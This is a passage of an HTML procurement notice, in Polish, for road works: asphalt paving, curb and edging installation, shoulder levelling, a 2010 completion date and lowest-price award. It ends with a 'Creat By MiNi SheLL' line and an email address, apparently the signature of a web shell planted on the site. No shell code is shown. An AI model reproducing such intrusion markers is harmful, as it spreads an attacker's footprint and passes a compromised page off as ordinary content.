-    nawierzchnia  z  betonu  asfaltowego  gr. 6  cm   - 9.250,0 m2
-    montaż  krawężnika  drogowego  o  wym. 15x30x100  mm  - 10,0 mb
-    montaż  opornika  betonowego  o  wym. 8x30x100  mm - 3.700,0 mb
-    plantowanie  pobocza  - 2.590,0 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.08.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com